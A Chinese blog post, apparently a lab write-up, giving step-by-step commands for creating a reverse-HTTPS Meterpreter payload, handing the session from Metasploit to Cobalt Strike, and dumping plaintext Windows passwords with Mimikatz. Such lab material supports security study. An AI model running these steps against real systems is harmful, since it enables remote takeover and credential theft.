防御保护基础----两个小实验

cs与msf权限传递

1. 在Metasploit中获取会话

# 在Metasploit中设置监听器
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST [Metasploit主机IP]
set LPORT [选择的端口]
exploit

# 在目标系统上执行Metasploit生成的payload
# 例如,使用msfvenom生成一个可执行文件
msfvenom -p windows/meterpreter/reverse_https LHOST=[Metasploit主机IP] LPORT=[选择的端口] -f exe > payload.exe

  2. 在Cobalt Strike中接收会话

# 在Cobalt Strike中设置监听器
# 打开Cobalt Strike客户端,连接到服务端
# 创建一个新的监听器,选择HTTPS Beacon
# 设置好IP和端口,保存并启动监听器

# 在Metasploit中获取的会话上线到Cobalt Strike
# 在Metasploit中,使用以下命令将会话传递到Cobalt Strike
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_https
set LHOST [Metasploit主机IP]
set LPORT [选择的端口]
set SESSION [Metasploit中的会话ID]
set DisablePayloadHandler true
exploit

mimikatz抓取win2012明文密码

  1. 在Cobalt Strike中上传Mimikatz

# 在Cobalt Strike中上传Mimikatz到目标系统
upload /path/to/mimikatz.exe

 2. 在目标系统上执行Mimikatz

# 在Cobalt Strike的命令行中执行Mimikatz
execute-assembly /path/to/mimikatz.exe

 3. 使用Mimikatz抓取明文密码

# 在Mimikatz中,使用以下命令抓取明文密码
privilege::debug
sekurlsa::logonpasswords

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值